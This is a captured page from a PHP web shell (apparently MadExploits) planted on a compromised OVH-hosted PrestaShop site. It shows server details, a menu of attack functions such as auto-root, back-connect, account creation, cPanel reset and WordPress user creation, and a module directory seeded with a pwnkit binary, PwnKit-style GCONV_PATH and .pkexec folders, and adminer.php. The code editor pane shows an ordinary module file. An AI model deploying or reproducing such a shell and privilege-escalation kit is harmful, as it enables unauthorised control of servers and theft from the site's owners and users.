Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
garmin /
modules /
spverticalmenu /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwx---r-x
image
[ DIR ]
drwx---r-x
js
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
Readme.md
1.7
KB
-rw----r--
VerticalGroup.php
4.04
KB
-rw----r--
Verticalmenu.php
32.57
KB
-rw----r--
adminer.php
465.43
KB
-rw-r--r--
ajax_spsortgroup.php
1.14
KB
-rw----r--
config.xml
518
B
-rw----r--
config_fr.xml
518
B
-rw-rw-r--
index.php
1.24
KB
-rw----r--
logo.gif
1.38
KB
-rw----r--
logo.png
1.47
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
sample.php
52.65
KB
-rw----r--
spverticalmenu.php
63.41
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax_spsortgroup.php
<?php /** * package SP sp homeslider * * @version 1.0.1 * @author MagenTech http://www.magentech.com * @copyright (c) 2014 YouTech Company. All Rights Reserved. * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL */ include_once ( '../../config/config.inc.php' ); include_once ( '../../init.php' ); include_once ( 'spverticalmenu.php' ); $context = Context::getContext (); $spverticalmenu = new spverticalmenu(); $items = array(); if (!Tools::isSubmit ('secure_key') || Tools::getValue ('secure_key') != $spverticalmenu->secure_key || !Tools::getValue ('action')) die( 1 ); if (Tools::getValue ('action') == 'updateGroupPosition' && Tools::getValue ('item')) { $items = Tools::getValue ('item'); $pos = array(); $success = true; foreach ($items as $position => $item) { $success &= Db::getInstance ()->execute (' UPDATE `'._DB_PREFIX_.'spverticalmenu_group` SET `position` = '.(int)$position.' WHERE `id_spverticalmenu_group` = '.(int)$item); } if (!$success) die( Tools::jsonEncode (array( 'error' => 'Update Fail' )) ); die( Tools::jsonEncode (array( 'success' => 'Update Success !', 'error' => false )) ); }
Close